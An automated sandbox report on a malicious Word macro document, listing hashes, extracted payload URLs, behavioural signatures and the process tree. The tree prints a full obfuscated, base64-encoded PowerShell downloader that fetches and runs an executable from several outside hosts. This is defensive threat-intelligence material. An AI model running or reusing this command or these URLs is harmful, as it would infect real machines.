Analysis
-
max time kernel
101s -
max time network
70s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-09-2024 23:13
Static task
static1
Behavioral task
behavioral1
Sample
ee9dec7bc1e9574e2e1bf9a1a4499928_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ee9dec7bc1e9574e2e1bf9a1a4499928_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
ee9dec7bc1e9574e2e1bf9a1a4499928_JaffaCakes118.doc
-
Size
157KB
-
MD5
ee9dec7bc1e9574e2e1bf9a1a4499928
-
SHA1
10a2261d0599abc59d5c250e4c7b1844796494c0
-
SHA256
5eae5031bef8f074ac1830fc0b0fff4f51d6fa04d513732a1394bd23c335a6aa
-
SHA512
f79b841183f4f3b98c086b821838a453a8f1fa7fea9c0df72042449624c06ca418a3cd867d6e375a02589684d30d22ae603d96eff3f962150372ddaf721a736e
-
SSDEEP
1536:HB445TEgrO3jSWAg83tle1ZZ0293QM0eetR2cOupLB5UZ55+a9WbPxLF/9qNWcj2:H22TWTogk079THcpOu5UZkb9F/94Wcj2
Malware Config
Extracted
http://inflixon.com/wp-admin/472/
http://bballbreak.com/wp-admin/O/
http://etiangong.com/h5/Gxm/
https://lbbniu.com/idealnotify/y/
http://crashboxcharlotte.com/wp-includes/8/
http://trendyhome.ltd/img4qrg/c/
http://104.196.113.47/wp-admin/D/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2880 2872 POWeRsHeLL.exe 30 -
Blocklisted process makes network request 3 IoCs
flow pid Process 7 2880 POWeRsHeLL.exe 9 2880 POWeRsHeLL.exe 12 2880 POWeRsHeLL.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk POWeRsHeLL.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\TypeLib\{B6C3C87C-5175-421C-A333-1E8B5441AADE}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B6C3C87C-5175-421C-A333-1E8B5441AADE}\2.0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\TypeLib\{B6C3C87C-5175-421C-A333-1E8B5441AADE} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B6C3C87C-5175-421C-A333-1E8B5441AADE}\2.0\0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1640 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2880 POWeRsHeLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2880 POWeRsHeLL.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1640 WINWORD.EXE 1640 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1640 wrote to memory of 2404 1640 WINWORD.EXE 34 PID 1640 wrote to memory of 2404 1640 WINWORD.EXE 34 PID 1640 wrote to memory of 2404 1640 WINWORD.EXE 34 PID 1640 wrote to memory of 2404 1640 WINWORD.EXE 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ee9dec7bc1e9574e2e1bf9a1a4499928_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWeRsHeLL.exePOWeRsHeLL -ENCOD JABTADcANgAwAG0AYQBjAD0AKAAnAFUAJwArACcAYQAnACsAKAAnAGEAcwAnACsAJwA5ADgAeAAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAEUATgB2ADoAVQBTAEUAcgBQAHIATwBGAGkATABFAFwAbQBNADMARQAzAG0ASgBcAEcAdgBuADMAUgA5AGwAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAHIAZQBDAHQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBDAHUAcgBgAEkAVABgAFkAUAByAG8AVABgAG8AYwBvAGwAIgAgAD0AIAAoACgAJwB0AGwAcwAxACcAKwAnADIAJwApACsAKAAnACwAIAB0AGwAJwArACcAcwAxACcAKQArACcAMQAnACsAJwAsACcAKwAnACAAJwArACgAJwB0ACcAKwAnAGwAcwAnACkAKQA7ACQAVABlAHcAcwBnAGUANgAgAD0AIAAoACcARgByACcAKwAoACcAZQBfAGkAMQAnACsAJwBjACcAKQArACcAaABtACcAKQA7ACQAWQBlAHoAaAB5ADQANQA9ACgAJwBVAGwAJwArACgAJwBrADcAeAAnACsAJwByAGsAJwApACkAOwAkAE8AdwA5AGgAegBjAF8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAnACsAJwAwAH0ATQBtADMAZQAzACcAKwAnAG0AagB7ADAAJwArACcAfQBHAHYAbgAnACsAJwAzACcAKwAnAHIAOQAnACsAJwBsAHsAMAB9ACcAKQAgACAALQBmACAAWwBDAGgAYQBSAF0AOQAyACkAKwAkAFQAZQB3AHMAZwBlADYAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABKADMAbQAzAHQAbgA5AD0AKAAoACcATwAnACsAJwBhADQAbABoACcAKQArACcAXwAnACsAJwA0ACcAKQA7ACQATAB1ADEAbwB2AGsAaAA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAJwArACcAZQBjAHQAJwApACAAbgBFAHQALgBXAEUAYgBjAGwASQBFAE4AdAA7ACQASgAzAGYAMgB3AHQAcAA9ACgAKAAnAGgAdAAnACsAJwB0AHAAOgAnACkAKwAoACcALwAnACsAJwAvAGkAbgAnACkAKwAnAGYAJwArACgAJwBsACcAKwAnAGkAeABvAG4AJwApACsAKAAnAC4AJwArACcAYwBvAG0AJwApACsAKAAnAC8AJwArACcAdwBwACcAKQArACcALQAnACsAKAAnAGEAZAAnACsAJwBtAGkAbgAvADQAJwArACcANwAnACkAKwAoACcAMgAnACsAJwAvACoAaAAnACsAJwB0AHQAJwApACsAKAAnAHAAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnAGIAYgBhAGwAJwArACcAbABiAHIAZQAnACkAKwAoACcAYQBrAC4AYwAnACsAJwBvAG0ALwB3AHAAJwApACsAKAAnAC0AJwArACcAYQBkAG0AaQBuACcAKQArACgAJwAvAE8AJwArACcALwAqAGgAJwApACsAJwB0AHQAJwArACcAcAAnACsAKAAnADoALwAnACsAJwAvAGUAJwApACsAKAAnAHQAaQAnACsAJwBhACcAKQArACcAbgAnACsAKAAnAGcAJwArACcAbwBuACcAKQArACcAZwAuACcAKwAoACcAYwAnACsAJwBvAG0AJwArACcALwBoADUALwAnACkAKwAoACcARwB4AG0AJwArACcALwAnACkAKwAnACoAaAAnACsAJwB0ACcAKwAoACcAdABwACcAKwAnAHMAJwApACsAJwA6ACcAKwAoACcALwAvACcAKwAnAGwAJwApACsAKAAnAGIAJwArACcAYgBuACcAKQArACgAJwBpACcAKwAnAHUALgAnACkAKwAoACcAYwBvACcAKwAnAG0AJwApACsAKAAnAC8AJwArACcAaQBkAGUAYQAnACkAKwAnAGwAJwArACgAJwBuAG8AJwArACcAdAAnACkAKwAnAGkAJwArACgAJwBmAHkALwB5AC8AJwArACcAKgBoACcAKwAnAHQAdAAnACkAKwAnAHAAOgAnACsAJwAvACcAKwAnAC8AYwAnACsAJwByACcAKwAnAGEAcwAnACsAKAAnAGgAYgAnACsAJwBvACcAKQArACcAeAAnACsAKAAnAGMAaABhAHIAJwArACcAbAAnACkAKwAnAG8AdAAnACsAKAAnAHQAZQAnACsAJwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACkAKwAnAC8AJwArACcAdwAnACsAKAAnAHAALQBpAG4AJwArACcAYwAnACkAKwAoACcAbAB1ACcAKwAnAGQAJwApACsAJwBlAHMAJwArACcALwAnACsAKAAnADgAJwArACcALwAqAGgAdAB0ACcAKwAnAHAAOgAvACcAKQArACcALwB0ACcAKwAnAHIAJwArACgAJwBlACcAKwAnAG4AZAAnACkAKwAoACcAeQBoAG8AJwArACcAbQAnACkAKwAoACcAZQAuACcAKwAnAGwAJwApACsAJwB0AGQAJwArACgAJwAvAGkAbQAnACsAJwBnADQAJwArACcAcQByACcAKQArACcAZwAnACsAKAAnAC8AYwAvACcAKwAnACoAJwApACsAKAAnAGgAdAB0AHAAJwArACcAOgAvAC8AMQAnACsAJwAwADQALgAnACkAKwAnADEAOQAnACsAKAAnADYAJwArACcALgAxACcAKQArACgAJwAxADMAJwArACcALgAnACkAKwAoACcANAA3AC8AJwArACcAdwAnACsAJwBwAC0AYQAnACkAKwAnAGQAJwArACgAJwBtAGkAJwArACcAbgAvAEQALwAnACkAKQAuACIAcwBQAGAATABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABRADYAYwA5AHcAdgBtAD0AKAAoACcAUgAnACsAJwAzAGQAbQB4ACcAKQArACcAbQA1ACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEIAYwBxAHcAbQBhADYAIABpAG4AIAAkAEoAMwBmADIAdwB0AHAAKQB7AHQAcgB5AHsAJABMAHUAMQBvAHYAawBoAC4AIgBEAG8AVwBOAGAATABgAG8AQQBkAEYAYABpAGwAZQAiACgAJABCAGMAcQB3AG0AYQA2ACwAIAAkAE8AdwA5AGgAegBjAF8AKQA7ACQAUwA0AG4AbAA3AHYAMAA9ACgAKAAnAEUAagAnACsAJwB5ACcAKQArACgAJwB5AF8AJwArACcAcwAnACkAKwAnADAAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAE8AdwA5AGgAegBjAF8AKQAuACIAbABlAGAATgBnAGAAVABIACIAIAAtAGcAZQAgADMANgA2ADEAMQApACAAewAmACgAJwBJACcAKwAnAG4AdgBvAGsAZQAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACgAJABPAHcAOQBoAHoAYwBfACkAOwAkAFEAagA0AG8AbQA1ADMAPQAoACcAQwAnACsAJwBjADMAJwArACgAJwBqACcAKwAnAHcANQBpACcAKQApADsAYgByAGUAYQBrADsAJABEAHcAcAB3AHMANABiAD0AKAAnAE4AJwArACgAJwAzAG4AJwArACcAOQB6AGoAZwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASAA1AGEAYwBhAGsAbgA9ACgAKAAnAFAANwAnACsAJwAzAHMAJwApACsAKAAnAGgAJwArACcAbQB1ACcAKQApAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD502c1601e50f8d7ec293b18d9323a300f
SHA1df888853d021bbb5951f077f8bfbfb92c3bbf07f
SHA256b4b91418638a49413fd18454e61afff15e4c508d7d1e09d2338aa32ab28146e2
SHA5129e3bf35a150b0dd2d877a7527c95500e8d6c53522eef549fcac580c6edca632d62dbc72a4675a7976e9ee108ae997daae66f434fe908f75e135d57534a90f608